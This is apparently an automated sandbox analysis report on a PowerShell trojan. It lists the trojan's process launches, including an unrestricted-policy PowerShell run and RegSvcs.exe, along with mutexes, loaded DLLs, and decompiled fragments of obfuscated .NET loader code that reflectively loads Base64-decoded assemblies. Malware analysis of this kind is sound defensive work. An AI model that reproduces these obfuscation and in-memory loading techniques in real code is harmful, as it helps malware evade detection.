              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engine | Classification label: mal100.troj.evad.winPS1@6/5@0/1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzzekrex.fgy.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: mhqxUdpe7V.ps1 | Virustotal: Detection: 9%
              Source: mhqxUdpe7V.ps1 | ReversingLabs: Detection: 13%
              Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

              Data Obfuscation

              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.JAcwvugr7yueKabGzBseGV7hjHu3W5QkNTNx8sjM423vV0qUPhEfZ5MkLIEJU4xShmmuAovdOhpox4n3YIsmafGmDjbdd,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ._0L8f3WleevzcnPl9n2WNh7NW3wKOwPuy3tb1aRsXW0f6uDBis6nnThh3XPCCqA67oaXX8IvfAGwXsJMVtwgg9Ni2DmPT8,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.AXmSpip9Rgys9UoRCdGDlWOrb1oWCmZg9LzuKvf7aAgnKzemNYUyaBbirLIHk9vkM1Q5MLhWeOn1dI5xukaKG5mOVcOdq,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.pdozcqiNcmOnTnX1sUHm37yRWYhfKxfHJgJzzWfK4H9V6gQ9zRXQa28p93aV0bU5xPMwelYaDwx7MaHuT0cauWHxV6Umo,QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.ZUrIm4Kp1Nn4jNQE1iMoBcsuerfZEYytj3QZ()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[2],QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.sOh0Jlwra2Jn4MOGwAe1E2VHcq3RkFs1RAqN(Convert.FromBase64String(YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.JAcwvugr7yueKabGzBseGV7hjHu3W5QkNTNx8sjM423vV0qUPhEfZ5MkLIEJU4xShmmuAovdOhpox4n3YIsmafGmDjbdd,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ._0L8f3WleevzcnPl9n2WNh7NW3wKOwPuy3tb1aRsXW0f6uDBis6nnThh3XPCCqA67oaXX8IvfAGwXsJMVtwgg9Ni2DmPT8,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.AXmSpip9Rgys9UoRCdGDlWOrb1oWCmZg9LzuKvf7aAgnKzemNYUyaBbirLIHk9vkM1Q5MLhWeOn1dI5xukaKG5mOVcOdq,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.pdozcqiNcmOnTnX1sUHm37yRWYhfKxfHJgJzzWfK4H9V6gQ9zRXQa28p93aV0bU5xPMwelYaDwx7MaHuT0cauWHxV6Umo,QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.ZUrIm4Kp1Nn4jNQE1iMoBcsuerfZEYytj3QZ()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[2],QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.sOh0Jlwra2Jn4MOGwAe1E2VHcq3RkFs1RAqN(Convert.FromBase64String(YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF887A5A0B1 push cs; ret 0_2_00007FF887A5A0E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF887A56FDC push eax; iretd 0_2_00007FF887A56FDD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF887A5C752 pushfd ; ret 0_2_00007FF887A5C757
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF887A5AB3C push es; iretd 0_2_00007FF887A5AB67
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, b02VErUOAyp7KgsN3bFDF2auprIqAGCLaGMp.cs | High entropy of concatenated method names: 'INkezmr6hizs7DYFjV4aAMMuO4B8vcIzpRzl', '_1UgweADLCOTyFcav1bCSPpZmBT2YjbCvAU2a', 'N38ShQwEPMzDIeuhJy4EphCuYO22ULsDR4AR', 'VQJXMcVFd751mpqtfhNss', 'MoXo9dtjQWauKcR4tF0QZ', '_9KThUWSyhPoAhybqdEEGn', 'ZOGHWakUiTGxpDEMxkgVq', 'VbdrNDJi8xPxLw2mCoL5G', 'ZDOPOAfhNiZba9q2wF0zk', 'gLT3eh2G9sbPPYX5MS02M'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, ecfzk1BLTMVYPDpfIlTKGWKme1YqqZGoyQ7Vc33TJphCOCCj76EqW1abpBIyhIQ4ZDwplcAJv1P6YGgTLqEZyNFN0Yjag.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'aBhmG8hesQRZx5swb8QklvJR7WenRTLT4PpJ', 'J3SeuSTYALTr3yfRGGRIng8jjRcOlYfMvoE8', 'EoOkNZdPQEWcWFnAib8PkZw6yS7hompPojzR', 'FJElkQ5aMB1hwH9O2Q9GR2Cz4GaNeyxzx8iv'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | High entropy of concatenated method names: 'ACdeIzXseyPo4zWqWy02RazcDiWaeYEF3sMU', 'KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K', 'N1sexz3RI1DpSUs8sFctRkct2k71o6Dw5adn', 'UqsaOcNK4UPWrSnz315O3fHPN7hmKXXzM5ek', 'JVZHi2GrdZvpd6rLMCYrVVcMGmoHeoBq6p3H', 'pyZ9AMn9R81CWO7jWKyfev1oi7ghwwdSnb3i', 'qZ6RmsuveDKUm2nZ6abIPK0CPfRROfax8QwG', 'NKRNz1jRg2dg9416sbsJ9O1Prxh7Ujl233zE', 'ai8NTPVbOPHKdfOoapJOEteWyRNHxMPPWDhT', 'NvDSL0KgPKbgoTgffwjCGHfA0D7JbHNtdeDP'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.cs | High entropy of concatenated method names: 'Vl7IYPbs0k94qffFzhKGetVhWAXE2DuwFW3Z', '_0Byrd5Yenv0fM67D8WjMm', 'FTmqyKQFF2nZLlpTlQxHj', 'ycVPE2G11CcWkNNNsiscT', '_1Ou3AbDogGuZOToO0DEh1'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, tSBhnwvdpxEXyJxA8lGv4Bgp4p8TME6qQQXq.cs | High entropy of concatenated method names: 'NxpU6fdmEe350QRzSjmBG9bNgqiTmTVt3HvB', '_0iGLzTupk4oCtdljtdO0J', 'GH26cbm9WLUxhV866JkHg', '_41oPTrdIImlCUF6BZDilb', 'sy473pUm38ZS8xSNy8qaL'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | High entropy of concatenated method names: 'J8wHw2osnqTKiwkc3AZR8dJNxdbogdSKtxmF', 'qRcvRLsx0rxBIjhYsY9PC5vCWjsb8g2zuOH7', 'hLvrRQnXSt6R0bWy2ezji7tuxQIXN8qZ0RVf', 'ceHhszv7a2pCt2179HvaC23Hie2toqek6kQm', 'rMQUqeCYVWFCeYXZemrUiFJninSg7w4dNwcp', 'w5OdajmqiE1M7BW3IMdtUvegP99kuNYpO8vy', 'BjIxTPFBlXVTDrgqc7l5EYgWBO9QbMzlkizN', 'Su3QHI7NRcYJwIpsPYz5ohtFr2qfwzPcRLZJ', 'vABejWKfbSdGkHO9pNjXKLu0vDNBKiHgCRXA', '_5rpp77KCzZlHIngjWeMz70hTryBV4kjkB21s'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, Ovf0N5CQI1OINhI7lGry0rZm9kRY1ouImX1rRJDUauSsRBy7XEy1Vt7xi5mHlsT56DNCiId2YJlUZmsE23x0zAxkvKtDD.cs | High entropy of concatenated method names: 'U5sr0xpHdPhDSSbzFhxVIzRWeUyjHKaz7fC1kB0zXHJhnGI0CUd6SU5JrE3jDkMuJaZ7EPji9ym2R2XoRsaHYn1rH30jX', '_1uaG3Jmqcbu2z3C6aXj7JDQp2ADrLzHvGZEbDAKFqxfCBIw8pqHWCSMAzwDlV7JEVIKw2jbg6Y6KWsHnPlqFhGkgkWgUO', 'zQW9aPhZQcTvVUKWPGF2Lx6BnGfcxuOWukqHMV5NabLvy73gvdWFFJrw8wap5tuyfzFK81X3Lcq2tDHNKzdH2wLMcfc6J', '_4evsVFwMgy4n0x0cZfFsT', 'bqSHGcZwiXLgYoIjsUGSg', 'Wgka3ShlAx39hjLg9aMl6', '_1GVuR1tPkrWg5WEjE8zNi', 'Gf4QevTLf6VvSRMQTyTwD', 'pLeUDmoCnx132zeKo40LY', 'OnEtj15FfkoF6zFGMzPj9'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | High entropy of concatenated method names: 'xIeDGhWJh2dTLJj2KIKIkFlXgJ7yVJFMa5ZsnMElaczn389Ab5jcRZjYkKt4ktw9FQNKLIiNSjxfAYBeFydeIuEsxRDU0', 'iidSY7kDOs5FStDZNmRMEjt7glMgsaLCx80cm1y6v2rBQX100VXnfdgl8ByYbIq1ko8jZmN3f7W1XVjrN27WQa2rilPm8', 'FExflqz2ggYzAB8RkhZzQMhxx6cV08pL74aeNkOLC16P1A5u4mPbh4a9MT8ExggxPZvlSo1Qtx8QnVUuKM1ZGz1xvvbVE', 'GrEs6aQJtRM5DVNA9OStPBAI69B70MrCQV4OAAGaHOcugd3H2svSK0xh9ENhsIxRZzNDGBo079U7lkA0mxcejrA46fvwu', 'jXQ7CW5pazCc1V0AEwdp5SnRJDYF7u5sZpU1n9bZRSjgDRix2AIbxFkub0H4SD8hHRAob5vbVGbs5kHrIA0a7heeGQbl7', 'glsn8zXWNedoYiCWR7ggZIm7mZY5mNmOoEyXSr6Gd9iu88DRgb03GoD5Jw1HVc9eduqMCd7d76L4cERmtSvnznvJHtpF0', 'iccNNeoF51wTxbpATnVFbAdt8d8MulXIqrA55pnFvGlLeEqiiqogIHyvrrBCs4jIsjlfOXE0IFpBmAe8fJwMIuIbeX9Kf', 'jZpp5aIkL5DUHdMmI7HQBPJ6EmvQxikeAD4IAgyMBLIyLX0x1fcGkG6MTlxst0p7C61krxBu4e1dGyIgXSrjFGo1hTvqR', 'pXBe9HFDtAdZotphcgbdt1jtfMAXkED5dptTH1HtOoBwh5VCyGpNPIeDaGpQRtHO5QEcup2bma2XS7Ndj7k2FVaPEumb1', 'Q1EltKwM1R3yq1zXEHilAmDHGT4S5fhl21UG'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, b02VErUOAyp7KgsN3bFDF2auprIqAGCLaGMp.cs | High entropy of concatenated method names: 'INkezmr6hizs7DYFjV4aAMMuO4B8vcIzpRzl', '_1UgweADLCOTyFcav1bCSPpZmBT2YjbCvAU2a', 'N38ShQwEPMzDIeuhJy4EphCuYO22ULsDR4AR', 'VQJXMcVFd751mpqtfhNss', 'MoXo9dtjQWauKcR4tF0QZ', '_9KThUWSyhPoAhybqdEEGn', 'ZOGHWakUiTGxpDEMxkgVq', 'VbdrNDJi8xPxLw2mCoL5G', 'ZDOPOAfhNiZba9q2wF0zk', 'gLT3eh2G9sbPPYX5MS02M'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, ecfzk1BLTMVYPDpfIlTKGWKme1YqqZGoyQ7Vc33TJphCOCCj76EqW1abpBIyhIQ4ZDwplcAJv1P6YGgTLqEZyNFN0Yjag.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'aBhmG8hesQRZx5swb8QklvJR7WenRTLT4PpJ', 'J3SeuSTYALTr3yfRGGRIng8jjRcOlYfMvoE8', 'EoOkNZdPQEWcWFnAib8PkZw6yS7hompPojzR', 'FJElkQ5aMB1hwH9O2Q9GR2Cz4GaNeyxzx8iv'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | High entropy of concatenated method names: 'ACdeIzXseyPo4zWqWy02RazcDiWaeYEF3sMU', 'KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K', 'N1sexz3RI1DpSUs8sFctRkct2k71o6Dw5adn', 'UqsaOcNK4UPWrSnz315O3fHPN7hmKXXzM5ek', 'JVZHi2GrdZvpd6rLMCYrVVcMGmoHeoBq6p3H', 'pyZ9AMn9R81CWO7jWKyfev1oi7ghwwdSnb3i', 'qZ6RmsuveDKUm2nZ6abIPK0CPfRROfax8QwG', 'NKRNz1jRg2dg9416sbsJ9O1Prxh7Ujl233zE', 'ai8NTPVbOPHKdfOoapJOEteWyRNHxMPPWDhT', 'NvDSL0KgPKbgoTgffwjCGHfA0D7JbHNtdeDP'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.cs | High entropy of concatenated method names: 'Vl7IYPbs0k94qffFzhKGetVhWAXE2DuwFW3Z', '_0Byrd5Yenv0fM67D8WjMm', 'FTmqyKQFF2nZLlpTlQxHj', 'ycVPE2G11CcWkNNNsiscT', '_1Ou3AbDogGuZOToO0DEh1'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, tSBhnwvdpxEXyJxA8lGv4Bgp4p8TME6qQQXq.cs | High entropy of concatenated method names: 'NxpU6fdmEe350QRzSjmBG9bNgqiTmTVt3HvB', '_0iGLzTupk4oCtdljtdO0J', 'GH26cbm9WLUxhV866JkHg', '_41oPTrdIImlCUF6BZDilb', 'sy473pUm38ZS8xSNy8qaL'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | High entropy of concatenated method names: 'J8wHw2osnqTKiwkc3AZR8dJNxdbogdSKtxmF', 'qRcvRLsx0rxBIjhYsY9PC5vCWjsb8g2zuOH7', 'hLvrRQnXSt6R0bWy2ezji7tuxQIXN8qZ0RVf', 'ceHhszv7a2pCt2179HvaC23Hie2toqek6kQm', 'rMQUqeCYVWFCeYXZemrUiFJninSg7w4dNwcp', 'w5OdajmqiE1M7BW3IMdtUvegP99kuNYpO8vy', 'BjIxTPFBlXVTDrgqc7l5EYgWBO9QbMzlkizN', 'Su3QHI7NRcYJwIpsPYz5ohtFr2qfwzPcRLZJ', 'vABejWKfbSdGkHO9pNjXKLu0vDNBKiHgCRXA', '_5rpp77KCzZlHIngjWeMz70hTryBV4kjkB21s'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, Ovf0N5CQI1OINhI7lGry0rZm9kRY1ouImX1rRJDUauSsRBy7XEy1Vt7xi5mHlsT56DNCiId2YJlUZmsE23x0zAxkvKtDD.cs | High entropy of concatenated method names: 'U5sr0xpHdPhDSSbzFhxVIzRWeUyjHKaz7fC1kB0zXHJhnGI0CUd6SU5JrE3jDkMuJaZ7EPji9ym2R2XoRsaHYn1rH30jX', '_1uaG3Jmqcbu2z3C6aXj7JDQp2ADrLzHvGZEbDAKFqxfCBIw8pqHWCSMAzwDlV7JEVIKw2jbg6Y6KWsHnPlqFhGkgkWgUO', 'zQW9aPhZQcTvVUKWPGF2Lx6BnGfcxuOWukqHMV5NabLvy73gvdWFFJrw8wap5tuyfzFK81X3Lcq2tDHNKzdH2wLMcfc6J', '_4evsVFwMgy4n0x0cZfFsT', 'bqSHGcZwiXLgYoIjsUGSg', 'Wgka3ShlAx39hjLg9aMl6', '_1GVuR1tPkrWg5WEjE8zNi', 'Gf4QevTLf6VvSRMQTyTwD', 'pLeUDmoCnx132zeKo40LY', 'OnEtj15FfkoF6zFGMzPj9'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | High entropy of concatenated method names: 'xIeDGhWJh2dTLJj2KIKIkFlXgJ7yVJFMa5ZsnMElaczn389Ab5jcRZjYkKt4ktw9FQNKLIiNSjxfAYBeFydeIuEsxRDU0', 'iidSY7kDOs5FStDZNmRMEjt7glMgsaLCx80cm1y6v2rBQX100VXnfdgl8ByYbIq1ko8jZmN3f7W1XVjrN27WQa2rilPm8', 'FExflqz2ggYzAB8RkhZzQMhxx6cV08pL74aeNkOLC16P1A5u4mPbh4a9MT8ExggxPZvlSo1Qtx8QnVUuKM1ZGz1xvvbVE', 'GrEs6aQJtRM5DVNA9OStPBAI69B70MrCQV4OAAGaHOcugd3H2svSK0xh9ENhsIxRZzNDGBo079U7lkA0mxcejrA46fvwu', 'jXQ7CW5pazCc1V0AEwdp5SnRJDYF7u5sZpU1n9bZRSjgDRix2AIbxFkub0H4SD8hHRAob5vbVGbs5kHrIA0a7heeGQbl7', 'glsn8zXWNedoYiCWR7ggZIm7mZY5mNmOoEyXSr6Gd9iu88DRgb03GoD5Jw1HVc9eduqMCd7d76L4cERmtSvnznvJHtpF0', 'iccNNeoF51wTxbpATnVFbAdt8d8MulXIqrA55pnFvGlLeEqiiqogIHyvrrBCs4jIsjlfOXE0IFpBmAe8fJwMIuIbeX9Kf', 'jZpp5aIkL5DUHdMmI7HQBPJ6EmvQxikeAD4IAgyMBLIyLX0x1fcGkG6MTlxst0p7C61krxBu4e1dGyIgXSrjFGo1hTvqR', 